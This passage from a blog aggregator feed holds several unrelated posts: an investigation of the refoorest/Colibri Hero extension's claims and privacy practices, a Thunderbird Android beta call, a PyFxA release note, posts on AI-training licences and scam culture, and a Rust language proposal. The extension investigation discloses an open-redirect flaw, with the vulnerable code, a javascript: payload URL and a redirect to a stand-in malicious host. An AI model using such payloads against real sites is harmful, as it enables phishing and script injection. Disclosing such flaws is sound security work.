Wait, was it actually determined by the affiliate commissions? We can get an idea by looking at the historical data for the number of planted trees. While Colibri Hero doesn’t provide that history, the refoorest website was captured by the Internet Archive at a significant number of points in time. I’ve collected the numbers and plotted them against the respective date. Nothing fancy like line smoothing, merely lines connecting the dots:

A graph plotting the number of trees on the Y axis ranging from 0 to 700,000 against the date on X axis ranging from November 2020 to September 2024. The chart is an almost straight line going from the lower left to the upper right corner. The only outliers are two jumps in year 2023.

Well, that’s a straight line. There is a constant increase rate of around 20 trees per hour here. And I hate to break it to you, a graph like that is rather unlikely to depend on anything related to the extension which certainly grew its user base over the course of these four years.

There are only two anomalies here where the numbers changed non-linearly. There is a small jump end of January or start of February 2023. And there is a far larger jump later in 2023 after a three month period where the Internet Archive didn’t capture any website snapshots, probably because the website was inaccessible. When it did capture the number again it was already above 500,000.

The privacy commitment

Refoorest website promises:

100% Data privacy guaranteed

The Impact Hero SDK explainer promises:

This new feature does not retain any information or data, ensuring 100% compliance with GDPR laws.

Ok, let’s first take a look at their respective privacy policies. Here is the refoorest privacy policy:

Screenshot of a text section titled “Nature of the data collected” followed by unformatted text: “In the context of the use of the Sites, refoorest may collect the following categories of data concerning its Users: Connection data (IP addresses, event logs ...) Communication of personal data to third parties Communication to the authorities on the basis of legal obligations Based on legal obligations, your personal data may be disclosed by application of a law, regulation or by decision of a competent regulatory or judicial authority. In general, we undertake to comply with all legal rules that could prevent, limit or regulate the dissemination of information or data and in particular to comply with Law No. 78-17 of 6 January 1978 relating to the IT, files and freedoms. ”

If you find that a little bit hard to read, that’s because whoever copied that text didn’t bother to format lists and such. Maybe better to read it on the Impact Bro website?

Screenshot of an unformatted wall of text: “Security and protection of personal data Nature of the data collected In the context of the use of the Sites, Impact Bro may collect the following categories of data concerning its Users: Connection data (IP addresses, event logs ...) Communication of personal data to third parties Communication to the authorities on the basis of legal obligations Based on legal obligations, your personal data may be disclosed by application of a law, regulation or by decision of a competent regulatory or judicial authority. In general, we undertake to comply with all legal rules that could prevent, limit or regulate the dissemination of information or data and in particular to comply with Law No. 78-17 of 6 January 1978 relating to the IT, files and freedoms.”

Sorry, that’s even worse. Not even the headings are formatted here.

Either way, nothing shows appreciation for privacy like a standard text which is also used by pizza restaurants and similarly caring companies. Note how that references “Law No. 78-17 of 6 January 1978”? That’s some French data protection law that I’m pretty certain is superseded by GDPR. A reminder: GDPR came in effect in 2018, three years before Colibri Hero was even founded.

This privacy policy isn’t GDPR-compliant either. For example, it has no mention of consumer rights or who to contact if I want my data to be removed.

Data like what’s stored in those refoorest accounts which happen to be publicly visible. Some refoorest users might actually find that fact unexpected.

Or data like the email address that the extension promises two trees for. Wait, they don’t actually have that one. The email address goes straight to Poptin LTD, a company registered in Israel. There is no verification that the user owns the address like double opt-in. But at least Poptin has a proper GDPR-compliant privacy policy.

There is plenty of tracking going on all around refoorest, with data being collected by Cloudflare, Google, Facebook and others. This should normally be explained in the privacy policy. Well, not in this one.

Granted, there is less tracking around the Impact Hero SDK, still a far shot away from the “not retain any information or data” promise however. The “eco-friendly mode” explainer loads Google Tag Manager. The affiliate networks that extensions trigger automatically collect data, likely creating profiles of your browsing. And finally: why is each request going through a Colibri Hero website before redirecting to the affiliate network if no data is being collected there?

Happy users

We’ve already seen that a fair amount of users leaving a review for the refoorest extension have been incentivized to do so. That’s the reason for “insightful” reviews like this one:

A five-star review from Jasper saying: “sigma.” Below it a text says “1 out of 3 found this helpful.”

Funny enough, several of them then complain about not receiving their promised trees. That’s due to an extension issue: the extension doesn’t actually track whether somebody writes a review, it simply adds two trees with a delay after the “Leave a review” button is clicked. A bug in the code makes it “forget” that it meant to do this if something else happens in between. Rather that fixing the bug they removed the delay in the current extension version. The issue is still present when you give them your email address though.

But what about the user testimonies on their webpage?

A section titled “What our users say” with three user testimonies, all five stars. Emma says: “The extension allows you to make a real impact without altering your browsing habits. It's simple and straightforward, so I say: YES!” Stef says: “Make a positive impact on the planet easily and at no cost! Download and start using refoorest today. What are you waiting for? Act now!” Youssef says: “This extension is incredibly user-friendly. I highly recommend it, especially because it allows you to plant trees without leaving your home.”

Yes, this sounds totally like something real users would say, definitely not written by a marketing person. And these user photos definitely don’t come from something like the Random User Generator. Oh wait, they do.

In that context it makes sense that one of the company’s founders engages with the users in a blog titled “Eco-Friendly Living” where he posts daily articles with weird ChatGPT-generated images. According to metadata, all articles have been created on the same date, and each article took around four minutes – he must be a very fast typer. Every article presents a bunch of brands, and the only thing (currently) missing to make the picture complete are affiliate links.

Security issue

It’s not like the refoorest extension or the SDK do much. Given that, the company managed to produce a rather remarkable security issue. Remember that their links always point to a Colibri Hero website first, only to be redirected to the affiliate network then? Well, for some reason they thought that performing this redirect in the extension was a good idea.

So their extension and their SDK do the following:

if (window.location.search.indexOf("partnerurl=") > -1) {
  const url = decodeURIComponent(gup("partnerurl", location.href));

  location.href = url;

  return;
}

Found a partnerurl parameter in the query string? Redirect to it! You wonder what websites this code is active on? All of them of course! What could possibly go wrong…

Well, the most obvious thing to go wrong is: this might be a javascript: URL. A malicious website could open https://example.com/?partnerurl=javascript:alert(1) and the extension will happily navigate to that URL. This almost became a Universal Cross-Site Scripting (UXSS) vulnerability. Luckily, the browser prevents this JavaScript code from running, at least with Manifest V3.

It’s likely that the same vulnerability already existed in the refoorest extension back when it was using Manifest V2. At that point it was a critical issue. It’s only with the improvements in Manifest V3 that extensions’ content scripts are subject to a Content Security Policy which prevents execution of arbitrary Javascript code.

So now this is merely an open redirect vulnerability. It could be abused for example to disguise link targets and abuse trust relationships. A link like https://example.com/?partnerurl=https://evil.example.net/ looks like it would lead to a trusted example.com website. Yet the extension would redirect it to the malicious evil.example.net website instead.

Conclusions

We’ve seen that Colibri Hero is systematically misleading extension users about the nature of its business. Users are supposed to feel good about doing something for the planet, and the entire communication suggests that the “partners” are contributing finances due to sharing this goal. The aspect of (ab)using the system of affiliate marketing is never disclosed.

This is especially damning in case of the refoorest extension where users are being incentivized by a number of trees supposedly planted as a result of their actions. At no point does Colibri Hero disclose that this number is purely virtual, with the actual count of trees planted being far lower and depending on entirely different factors. Or rather no factors at all if their reported numbers are to be trusted, with the count of planted trees always increasing at a constant rate.

For the Impact Hero SDK this misleading communication is paired with clearly insufficient user consent. Most extensions don’t ask for user consent at all, and those that do aren’t allowing an informed decision. The consent screen is merely a pretense to trick the users into granting extended permissions.

This by itself is already in gross violation of the Chrome Web Store policies and warrants a takedown action. Other add-on stores have similar rules, and Mozilla in fact already removed the refoorest extension prior to my investigation.

Colibri Hero additionally shows a pattern of shady behavior, such as quoting fake user testimonies, referring to themselves as “proof” of their beneficial activity and a general lack of transparency about finances. None of this is proof that this company isn’t donating money as it claims to do, but it certainly doesn’t help trusting them with it.

The technical issues and neglect for users’ privacy are merely a sideshow here. These are somewhat to be expected for a small company with limited financing. Even a small company can do better however if the priorities are aligned.

Mozilla ThunderbirdHelp Us Test the Thunderbird for Android Beta!

The Thunderbird for Android beta is out and we’re asking our community to help us test it. Beta testing helps us find critical bugs and rough edges that we can polish in the next few weeks. The more people who test the beta and ensure everything in the testing checklist works correctly, the better!

Help Us Test!

Anyone can be a beta tester! Whether you’re an experienced beta tester or you’ve never tested a beta image before, we want to make it easy for you. We are grateful for your time and energy, so we aim to make testing quick, efficient, and hopefully fun!!

The release plan is as follows, and we hope to stick to this timeline unless we encounter any major hurdles:

  • September 30 – First beta for Thunderbird for Android
  • Third week of October – first release candidate
  • Fourth week of October – Thunderbird for Android release

Download the Beta Image

Below are the options for where you can download with Beta and get started:

We are still working on preparing F-Droid builds. In the meanwhile, please make use of the other two download mechanisms.

Use the Testing Checklist

Once you’ve downloaded the Thunderbird for Android beta, we’d like you to check that you can do the following:

  • Automatic Setup (user only provides email address and maybe password)
  • Manual Setup (user provides server settings)
  • Read Messages
  • Fetch Messages
  • Switch accounts
  • Move email to folder
  • Notify for new message
  • Edit drafts
  • Write message
  • Send message
  • Email actions: reply, forward
  • Delete email
  • NOT experience data loss

Test the K-9 Mail to Thunderbird for Android Transfer

If you’re already using K-9 Mail, you can help test an important feature: transferring your data from K-9 Mail to Thunderbird for Android. To do this, you’ll need to make sure you’ve upgraded to the latest beta version of K-9 Mail.

This transfer process is a key step in making it easier for K-9 Mail users to move over to Thunderbird. Testing this will help ensure a smooth and reliable experience for future users making the switch.

Later builds will additionally include a way to transfer your information from Thunderbird Desktop to Thunderbird for Android.

What we’re not testing

We know it’s tempting to comment about everything you notice in the beta. For the purpose of this short initial beta, we won’t be focusing on addressing longstanding issues. Instead, we ask you to be laser focused on critical bugs, the checklist above, and issues could prevent users from effectively interacting with the app, to help us deliver a great initial release.

Where to Give Feedback

Share your feedback on the Thunderbird for Android beta mailing list and see the feedback of other users. It’s easy to sign up and let us know what worked and more importantly, what didn’t work from the tasks above. For bug reports, please provide as much detail as possible including steps to reproduce the issue, your device model and OS version, and any relevant screenshots or error messages.

Want to chat with other community members, including other testers and contributors working on Thunderbird for Android? Join us on Matrix!

Do you have ideas you would like to see in future versions of Thunderbird for Android? Let us know on Mozilla Connect, our official site to submit and upvote ideas.

The post Help Us Test the Thunderbird for Android Beta! appeared first on The Thunderbird Blog.

Wil ClouserPyFxA 0.7.9 Released

We released PyFxA 0.7.9 last week (pypi). This added:

  • Support for key stretching v2. See the end of bug 1320222 for some details. V1 will continue to work, but we’ll remove support for it at some point in the future.
  • Upgraded to support (and test!) Python 3

Special thanks to Rob Hudson and Dan Schomburg for thier efforts.

Don Martifair use alignment chart

Tantek Çelik suggests that Creative Commons should add a CC-NT license, like the existing Creative Commons licenses, but written to make it clear that the content is not licensed for generative AI training. Manton Reece likes the idea, and would allow training—but understands why publishers would choose not to. AI training permissions are becoming a huge deal, and there is a need for more licensing options. disclaimer: we’re taking steps in this area at work now. This is a personal blog post though, not speaking for employer or anyone else. In the 2024 AI Training Survey Results from Draft2Digital, only 5% of the authors surveyed said that scraping and training without a license is fair use.

Tantek links to the Creative Commons Position Paper on Preference Signals, which states,

Arguably, copyright is not the right framework for defining the rules of this newly formed ecosystem.

That might be a good point from the legal scholarship point of view, but the frequently expressed point of view of web people is more like, creepy bots are scraping my stuff, I’ll throw anything at them I can to get them to stop. Cloudflare’s one-click AI scraper blocker is catching on. For a lot of the web, the AI problem feels more like an emergency looting situation than an academic debate. AI training permissions will be a point where people just end up disagreeing, and where the Creative Commons approach to copyright, where the license deliberately limits the rights that a content creator can try to assert, is a bad fit for what many web people really want. People disagree on what is and isn’t fair use, and how far the power of copyright law should extend. And some free culture people who would prefer less powerful copyright laws in principle are not inclined to unilaterally refuse to use a tool that others are already using.

The techbro definition of fair use (what’s yours is open, what’s mine is proprietary) is clearly bogus, so we can safely ignore that—but it seems like Internet freedom people can be found along both axes of the fair use alignment chart. yes, there are four factors, but generative AI typically uses the entire work, so we can ignore the amount one, and we’re generally talking about human-created personal cultural works, so the nature of the copyrighted works we’re arguing about is generally similar. So we’re down to two, which is good because I don’t know how to make 3 and 4d tables in HTML.

Transformative purist: work must be signficantly transformed Transformative neutral: work must be somehow transformed Transformative chaotic: work may be transformed
Market purist: work must not have a negative effect on the market for the original Memes are fair use AI business presentation assistants are fair use A verbatim quotation from a book in a book review is fair use
Market neutral: work may have some effect on the market AI-generated ads are fair use AI slop blogs are fair use New Portraits is fair use
Market chaotic: work may have significant effect on the market for the original AI illustrations that mimic an artist's style but not specific artworks are fair use Orange Prince is fair use Grok is fair use

We’re probably going to end up with alternate free culture licenses, which is a good thing. But it’s probably not realistic to get organizations to change their alignment too much. Free culture licensing is too good of an idea to keep with one licensing organization, just like free software foundations (lower case) are useful enough that it’s a good idea to have a redundant array of them.

Do we need a toothier, more practical license?

This site is not licensed under a Creative Commons license, because I have some practical requirements that aren’t in one of the standard CC licenses. These probably apply to more sites than just this one. Personally, I would be happier with a toothier license that covers some of the reasons I don’t use CC now.

  • No permission for generative AI training (already covered this)

  • Licensee must preserve links when using my work in a medium where links work. I’m especially interested in preserving link rel=author and link rel=canonical. I would not mind giving general permission for copying and mirroring material from this site, except that SEO is a thing. Without some search engine signal, it would be too easy for a copy of my stuff on a higher-ranked site to make this site un-findable. I’m prepared to give up some search engine juice for giving out some material, just don’t want to get clobbered wholesale.

  • Patent license: similar to open-source software license terms. You can read my site but not use it for patent trolling. If you use my content, I get a license to any of your patents that would be infringed by making the content and operating the site.

  • Privacy flags: this site is licensed for human use, not for sale or sharing of personal info for behavioral targeting. I object to processing of any personal information that may be collected or inferred from this site.

In general, if I can’t pick a license that lets me make content available to people doing normal people stuff, but not to non-human entities with non-human goals, I will have to make the people ask me in person. Putting a page on the web can have interesting consequences, and a web-aware license that works for me will probably needs to color outside the lines of the ideal copyright law that would make sense if we were coming up with copyright laws from scratch.

Bonus links

Knowledge workers Taylor’s model of workplace productivity depended entirely on deskilling, on the invention of unskilled labor—which, heretofore, had not existed.

Reverse-engineering a three-axis attitude indicator from the F-4 fighter plane In a normal aircraft, the artificial horizon shows the orientation in two axes (pitch and roll), but the F-4 indicator uses a rotating ball to show the orientation in three axes, adding azimuth (yaw).

Grid-scale batteries: They’re not just lithium Alternatives to lithium-ion technology may provide environmental, labor, and safety benefits. And these new chemistries can work in markets like the electric grid and industrial applications that lithium doesn’t address well.

Zen and the art of Writer Decks (using the Pomera DM250) Probably as a direct result of the increasing spamminess of the internet in general and Windows 11 in its own right, over the past few years a market has emerged for WriterDecks—single purpose writing machines that include a keyboard (or your choice of keyboard), a screen, and some minimal distraction-free writing software.

How Taylor Swift’s endorsement of Harris and Walz is a masterpiece of persuasive prose: a songwriter’s practical lesson in written advocacy

Useful Idiots and Good Authoritarians Recycling some jokes here, but I think there’s something to be said for knowing an online illiberal’s favorite Good Authoritarian. Here’s what it says about them Related: With J.D. Vance on Trump ticket, the Nerd Reich goes national

Gamergate at 10 10 years later, the events of Gamergate remain a cipher through which it’s possible to understand a lot about our current sociocultural situation.

A Rose Diary Thanks to Mr. Austin these roses are now widely available and beautiful gardens around the world can be filled with roses that look like real roses and the smell of roses can be inhaled all over the world including on my own property.

Don MartiScam culture is everywhere

Just looking a recent news and how much of it is about surprisingly low-reputation decisions by surprisingly high-status business decision-makers. The big-picture trend that helps explain a lot of technology trends news is the ongoing collapse of business norms. Scam culture is getting mainstreamed faster than ever. Lots of related stories…

Online advertising is a…well, you knew that already. Brand safety a ‘con’ costing news industry billions, new research says How breaking up Google could lower your online shopping bill The Sleazy World of Reddit Marketing, Everything is Fake

Robot lawyers are fake. DoNotPay Has To Pay, After FTC Dings It For Lying About Its Non-Existent AI Lawyer

Academic publishing is a racket. Gates Foundation Shows That ‘Gold Open Access’ Was A Mistake, And ‘Diamond Open Access’ Is The Future

Other kinds of publishing are a racket, too. CNN and USA Today Have Fake Websites, I Believe Forbes Marketplace Runs Them Gannett’s ‘AI’ Scandals Result In Closure Of Wirecutter-esque Review Website, Layoffs

Pro sports are a racket. Legalizing Sports Gambling Was a Huge Mistake Want Access To Every NFL Game? It’ll Cost You, Thanks To Fractured Streaming Deals

Arrogant programmers and Enshittification - A New Understanding (read the whole thing. What happens when your self-worth is tied to work, but your boss is a growth hacker?)

Diseconomies of scale in fraud, spam, support, and moderation I don’t think it’s controversial to say that in general, a lot of things get worse as platforms get bigger.

The hate speech landscape on Facebook is worse than you thought. Here’s why In recent years, a growing number of politicians, human rights groups, and watchdogs have claimed that not only is Meta doing a poor job of removing harmful content, but its process for making enforcement decisions is happening in what they see as a black box. (There has always been some overlap between direct/database/online marketing, fraud, and right-wing politics in the USA. Goes back at least to the 1920s KKK boom. But today the connection is particularly strong. Maybe the national security Republicans were helping to keep that party from going into full growth hacker mode?) The return of Jacob Wohl! Yeah, he’s into AI now Trump’s $100,000 Watch Likely Made in China, Vastly Overpriced

Is Your Rent an Antitrust Violation? (Maybe we need a Lina Khan Signal, like the Batsignal but for Lina Khan?)

Anyway, it’s time to revise a lot of assumptions that were orignally made in the higher-trust business environment of the early, legit Web in its create more value than you capture days. Now that more devices, products, and services reflect scam culture settings by default, the rewards to tweaking, blocking, and other growth hacking avoidance are simliar to the rewards for PC power user skills back when those were a thing. More: Return of the power user

Niko MatsakisMaking overwrite opt-in #crazyideas

What would you say if I told you that it was possible to (a) eliminate a lot of “inter-method borrow conflicts” without introducing something like view types and (b) make pinning easier even than boats’s pinned places proposal, all without needing pinned fields or even a pinned keyword? You’d probably say “Sounds great… what’s the catch?” The catch it requires us to change Rust’s fundamental assumption that, given x: &mut T, you can always overwrite *x by doing *x = /* new value */, for any type T: Sized. This kind of change is tricky, but not impossible, to do over an edition.

TL;DR

We can reduce inter-procedural borrow check errors, increase clarity, and make pin vastly simpler to work with if we limit when it is possible to overwrite an &mut reference. The idea is that if you have a mutable reference x: &mut T, it should only be possible to overwrite x via *x = /* new value */ or to swap its value via std::mem::swap if T: Overwrite. To start with, most structs and enums would implement Overwrite, and it would be a default bound, like Sized; but we would transition in a future edition to have structs/enums be !Overwrite by default and to have T: Overwrite bounds written explicitly.

Structure of this series

This blog post is part of a series:

  1. This first post will introduce the idea of immutable fields and show why they could make Rust more ergonomic and more consistent. It will then show how overwrites and swaps are the key blocker and introduce the idea of the Overwrite trait, which could overcome that.
  2. In the next post, I’ll dive deeper into Pin and how the Overwrite trait can help there.
  3. After that, who knows? Depends on what people say in response.1

If you could change one thing about Rust, what would it be?

People often ask me to name something I would change about Rust if I could. One of the items on my list is the fact that, given a mutable reference x: &mut SomeStruct to some struct, I can overwrite the entire value of x by doing *x = /* new value */, versus only modifying individual fields like x.field = /* new value */.

Having the ability to overwrite *x always seemed very natural to me, having come from C, and it’s definitely useful sometimes (particularly with Copy types like integers or newtyped integers). But it turns out to make borrowing and pinning much more painful than they would otherwise have to be, as I’ll explain shortly.

In the past, when I’ve thought about how to fix this, I always assumed we would need a new form of reference type, like &move T or something. That seemed like a non-starter to me. But at RustConf last week, while talking about the ergonomics of Pin, a few of us stumbled on the idea of using a trait instead. Under this design, you can always make an x: &mut T, but you can’t always assign to *x as a result. This turns out to be a much smoother integration. And, as I’ll show, it doesn’t really give up any expressiveness.

Motivating example #1: Immutable fields

In this post, I’m going to motivate the changes by talking about immutable fields. Today in Rust, when you declare a local variable let x = …, that variable is immutable by default2. Fields, in contrast, inherit their mutability from the outside: when a struct appears in a mut location, all of its fields are mutable.

Not all fields are mutable, but I can’t declare that in my Rust code

It turns out that declaring local variables as mut is not needed for the borrow checker — and yet we do it nonetheless, in part because it helps readability. It’s useful to see when a variable might change. But if that argument holds for local variables, it holds double for fields! For local variables, we can find all potential mutation just by searching one function. To know if a field may be mutated, we have to search across many functions. And for fields, precisely because they can be mutated across functions, declaring them as immutable can actually help the borrow checker to see that your code is safe.

Idea: Declare fields as mutable

So what if we extended the mutable declaration to fields? The idea would be that, in your struct, if you want to mutate fields, you have to declare them as mut. This would allow them to be mutated: but only if the struct itself appears in a mutable local field.

For example, maybe I have an Analyzer struct that is created with some vector of datums and which has to compute the number of “important” ones:

#[derive(Default)]
struct Analyzer {
    /// Data being analyzed: will never be modified.
    data: Vec<Datum>,

    /// Number of important datums uncovered so far.
    mut important: usize,
}

As you can see from the struct declaration, the field data is declared as immutable. This is because we are only going to be reading the Datum values. The important field is declared as mut, indicating that it will be updated.

When can you mutate fields?

In this world, mutating a field is only possible when (1) the struct appears in a mutable location and (2) the field you are referencing is declared as mut. So this code compiles fine, because the field important is mut:

let mut analyzer = Analyzer::new();
analyzer.important += 1; // OK: mut field in a mut location

But this code does not compile, because the local variable x is not:

let x = Analyzer::default();
x.important += 1; // ERROR: `x` not declared as mutable

And this code does not compile, because the field data is not declared as mut:

let mut x = Analyzer::default();
x.data.clear(); // ERROR: field `data` is not declared as mutable

Leveraging immutable fields in the borrow checker

So why is it useful to declare fields as mut? Well, imagine you have a method like increment_if_important, which checks if datum.is_important() is true and modifies the important flag if so:

impl Analyzer {
    fn increment_if_important(&mut self, datum: &Datum) {
        if datum.is_important() {
            self.important += 1;
        }
    }
}

Now imagine you have a function that loops over self.data and calls increment_if_important on each item:

impl Analyzer {
    fn count_important(&mut self) {
        for datum in &self.data {
            self.increment_if_important(datum);
        }
    }
}

I can hear the experienced Rustaceans crying out in pain now. This function, natural as it appears, will not compile in Rust today. Why is that? Well, we have a shared borrow on self.data but we are trying to call an &mut self function, so we have no way to be sure that self.data will not be modified.

But what about immutable fields? Doesn’t that solve this?

Annoyingly, immutable fields on their own don’t change anything! Why? Well, just because you can’t write to a field directly doesn’t mean you can’t mutate the memory it’s stored in. For example, maybe I write a malicious version of increment_if_important:

impl Analyzer {
    fn malicious_increment_if_important(&mut self, datum: &Datum) {
        *self = Analyzer::default();
    }
}

This version never directly accesses the field data, but it just writes to *self, and hence it has the same impact. Annoying!

Generics: why we can’t trivially disallow overwrites

Maybe you’re thinking “well, can’t we just disallow overwriting *self if there are fields declared mut?” The answer is yes, we can, and that’s what this blog post is about. But it’s not so simple as it sounds, because we are changing the “basic contract” that all Rust types currently satisfy. In particular, Rust today assumes that if you have a reference x: &mut T and a value v: T, you can always do *x = v and overwrite the referent of x. That means I could can write a generic function like set_to_default:

fn set_to_default<T: Default>(r: &mut T) {
    *r = T::default();
}

Now, since Analyzer implements Default, I can make increment_if_important call set_to_default. This will still free self.data, but it does it in a sneaky way, where we can’t obviously tell that the value being overwritten is an instance of a struct with mut fields:

impl Analyzer {
    fn malicious_increment_if_important(&mut self, datum: &Datum) {
        // Overwrites `self.data`, but not in an obvious way
        set_to_default(self);
    }
}

Recap

So let’s step back and recap what we’ve seen so far:

  • If we could distinguish which fields were mutable and which were definitely not, we could eliminate many inter-function borrow check errors3.
  • However, just adding mut declarations is not enough, because fields can also be mutated indirectly. Specifically, when you have a &mut SomeStruct, you can overwrite with a fresh instance of SomeStruct or swap with another &mut SomeStruct, thus changing all fields at once.
  • Whatever fix we use has to consider generic code like std::mem::swap, which mutates an &mut T without knowing precisely what T is. Therefore we can’t do something simple like looking to see if T is a struct with mut fields4.

The trait system to the rescue

My proposal is to introduce a new, built-in marker trait called Overwrite:

/// Marker trait that permits overwriting
/// the referent of an `&mut Self` reference.
#[marker] // <-- means the trait cannot have methods
trait Overwrite: Sized {}

The effect of Overwrite

As a marker trait, Overwrite does not have methods, but rather indicates a property of the type. Specifically, assigning to a borrowed place of type T requires that T: Overwrite is implemented. For example, the following code writes to *x, which has type T; this is only legal if T: Overwrite:

fn overwrite<T>(x: &mut T, t: T) {
    *x = t; // <— requires `T: Overwrite`
}

Given this this code compiles today, this implies that a generic type parameter declaration like <T> would require a default Overwrite bound in the current edition. We would want to phase these defaults out in some future edition, as I’ll describe in detail later on.

Similarly, the standard library’s swap function would require a T: Overwrite bound, since it (via unsafe code) assigns to *x and *y:

fn swap<T>(x: &mut T, y: &mut T) {
    unsafe {
        let tmp: T = std::ptr::read(x);
        std::ptr::write(*x, *y); // overwrites `*x`, `T: Overwrite` required
        std::ptr::write(*y, tmp); // overwrites `*y`, `T: Overwrite` required
    }
}

Overwrite requires Sized

The Overwrite trait requires Sized because, for *x = /* new value */ to be safe, the compiler needs to ensure that the place *x has enough space to store “new value”, and that is only possible when the size of the new value is known at compilation time (i.e., the type implements Sized).

Overwrite only applies to borrowed values

The overwrite trait is only needed when assigning to a borrowed place of type T. If that place is owned, the owner is allowed to reassign it, just as they are allowed to drop it. So e.g. the following code compiles whether or not SomeType: Overwrite holds:

let mut x: SomeType = /* something */;
x = /* something else */; // <— does not require that `SomeType: Overwrite` holds

Subtle: Overwrite is not infectious

Somewhat surprisingly, it is ok to have a struct that implements Overwrite which has fields that do not. Consider the types Foo and Bar, where Foo: Overwrite holds but Bar: Overwrite does not:

struct Foo(Bar);
struct Bar;
impl Overwrite for Foo { }
impl !Overwrite for Bar { }

The following code would type check:

let foo = &mut Foo(Bar);
// OK: Overwriting a borrowed place of type `Foo`
// and `Foo: Overwrite` holds.
*foo = Foo(Bar);

However, the following code would not:

let foo = &mut Foo(Bar);
// ERROR: Overwriting a borrowed place of type `Bar`
// but `Bar: Overwrite` does not hold.
foo.0 = Bar;

Types that do not implement Overwrite can therefore still be overwritten in memory, but only as part of overwriting the value in which they are embedded. In the FAQ I show how this non-infectious property preserves expressiveness.5

Who implements Overwrite?

This section walks through which types should implement Overwrite.

Copy implies Overwrite

Any type that implements Copy would automatically implement Overwrite:

impl<T: Copy> Overwrite for T { }

(If you, like me, get nervous when you see blanket impls due to coherence concerns, it’s worth noting that RFC #1268 allows for overlapping impls of marker traits, though that RFC is not yet fully implemented nor stable. It’s not terribly relevant at the moment anyway.)

“Pointer” types are Overwrite

Types that represent pointers all implement Overwrite for all T:

  • &T
  • &mut T
  • Box<T>
  • Rc<T>
  • Arc<T>
  • *const T
  • *mut T
dyn,[], and other “unsized” types do not implement Overwrite

Types that do not have a static size, like dyn and [], do not implement Overwrite. Safe Rust already disallows writing code like *x = … in such cases.

There are ways to do overwrites with unsized types in unsafe code, but they’d have to prove various bounds. For example, overwriting a [u32] value could be ok, but you have to know the length of data. Similarly swapping two dyn Value referents can be safe, but you have to know that (a) both dyn values have the same underlying type and (b) that type implements Overwrite.

Structs and enums

The question of whether structs and enums should implement Overwrite is complicated because of backwards compatibility. I’m going to distinguish two cases: Rust 2021, and Rust Next, which is Rust in some hypothetical future edition (surely not 2024, but maybe the one after that).

Rust 2021. Struct and enum types in Rust 2021 implement Overwrite by default. Structs could opt-out from Overwrite with an explicit negative impl (impl !Overwrite for S).

Integrating mut fields. Structs that have opted out from Overwrite require mutable fields to be declared as mut. Fields not declared as mut are immutable. This gives them the nicer borrow check behavior.6

Rust Next. In some future edition, we can swap the default, with fields being !Overwrite by default and having to opt-in to enable overwrites. This would make the nice borrow check behavior the default.

Futures and closures

Futures and closures can implement Overwrite iff their captured values implement Overwrite, though in future editions it would be best if they simple do not implement Overwrite.

Default bounds and backwards compatibility

The other big backwards compatibility issue has to do with default bounds. In Rust 2021, every type parameter declared as T implicitly gets a T: Sized bound. We would have to extend that default to be T: Sized + Overwrite. This also applies to associated types in trait definitions and impl X types.7

Interestingly, type parameters declared as T: ?Sized also opt-out from Overwrite. Why is that? Well, remember that Overwrite: Sized, so if T is not known to be Sized, it cannot be known to be Overwrite either. This is actually a big win. It means that types like &T and Box<T> can work with “non-overwrite” types out of the box.

Associated type bounds are annoying, but perhaps not fatal

Still, the fact that default bounds apply to associated types and impl Trait is a pain in the neck. For example, it implies that Iterator::Item would require its items to be Overwrite, which would prevent you from authoring iterators that iterate over structs with immutable fields. This can to some extent be overcome by associated type aliases8 (we could declare Item to be a “virtual associated type”, mapping to Item2021 in older editions, which require Overwrite, and ItemNext in newer ones, which do not).

Frequently asked questions

OMG endless words. What did I just read?

Let me recap!

  • It would be more declarative and create fewer borrow check conflicts if we had users declare their fields as mut when they may be mutated and we were able to assume that non-mut fields will never be mutated.
    • If we were to add this, in the current Rust edition it would obviously be opt-in.
    • But in a future Rust edition it would become mandatory to declare fields as mut if you want to mutate them.
  • But to do that, we need to prevent overwrites and swaps. We can do that by introducing a trait, Overwrite, that is required to a given location.
    • In the current Rust edition, this trait would be added by default to all type parameters, associated types, and impl Trait bounds; it would be implemented by all structs, enums, and unions.
    • In a future Rust edition, the trait would no longer be the default, and structs, enums, and unions would have to explicitly implement if they want to be overwriteable.

This change doesn’t seem worth it just to get immutable fields. Is there more?

But wait, there’s more! Oh, you just said that. Yes, there’s more. I’m going to write a follow-up post showing how opting out from Overwrite eliminates most of the ergonomic pain of using Pin.

In “Rust Next”, who would ever implement Overwrite manually?

I said that, in Rust Next, types should be !Overwrite by default and require people to implement Overwrite manually if they want to. But who would ever do that? It’s a good question, because I don’t think there’s very much reason to.

Because Overwrite is not infectious, you can actually make a wrapper type…

#[repr(transparent)]
struct ForceOverwrite<T> { t: T }
impl<T> Overwrite for ForceOverwrite <T> { }

…and now you can put values of any type X into an ForceOverwrite <X> which can be reassigned.

This pattern allows you to make “local” use of overwrite, for example to implement a sorting algorithm (which has to do a lot of swapping). You could have a sort function that takes an &mut [T] for any T: Ord (Overwrite not required):

fn sort<T: Ord>(data: &mut [T])

Internally, it can safely transmute the &mut [T] to a &mut [ForceOverwrite<T>] and sort that. Note that at no point during that sorting are we moving or overwriting an element while it is borrowed (the slice that owns it is borrowed, but not the elements themselves).

What is the relationship of Overwrite and Unpin?

I’m still puzzling that over myself. I think that Overwrite is “morally the same” as Unpin, but it is much more powerful (and ergonomic) because it is integrated into the behavior of &mut (of course, this comes at the cost of a complex backwards compatibility story).

Let me describe it this way. Types that do not implement Overwrite cannot be overwritten while borrowed, and hence are “pinned for the duration of the borrow”. This has always been true for &T, but for &mut T has traditionally not been true. We’ll see in the next post that Pin<&mut T> basically just extends that guarantee to apply indefinitely.

Compare that to types that do not implement Unpin and hence are “address sensitive”. Such types are pinned for the duration of a Pin<&mut T>. Unlike T: !Overwrite types, they are not pinned by &mut T references, but that’s a bug, not a feature: this is why Pin has to bend over backwards to prevent you from getting your hands on an &mut T.

I’ll explain this more in my next post, of course.

Should Overwrite be an auto trait?

I think not. If we did so, it would lock people into semver hazards in the “Rust Next” edition where mut is mandatory for mutation. Consider a struct Foo { value: u32 } type. This type has not opted into becoming Copy, but it only contains types that are Copy and therefore Overwrite. By auto trait rules it would by default be Overwrite. But that would prevent you from adding a mut field in the future or benefit from immutable fields. This is why I said the default would just be !Overwrite, no matter the field types.

Conclusion

Obama Mic Drop

=)


  1. After this grandiose intro, hopefully I won’t be printing a retraction of the idea due to some glaring flaw… eep! ↩︎

  2. Whenever I saw immutable here, I mean immutable-modulo-Cell, of course. We should probably find another word for that, this is kind of terminology debt that Rust has bought its way into and I’m not sure the best way for us to get out! ↩︎

  3. Immutable fields don’t resolve all inter-function borrow conflicts. To do that, you need something like view types. But in my experience they would eliminate many. ↩︎

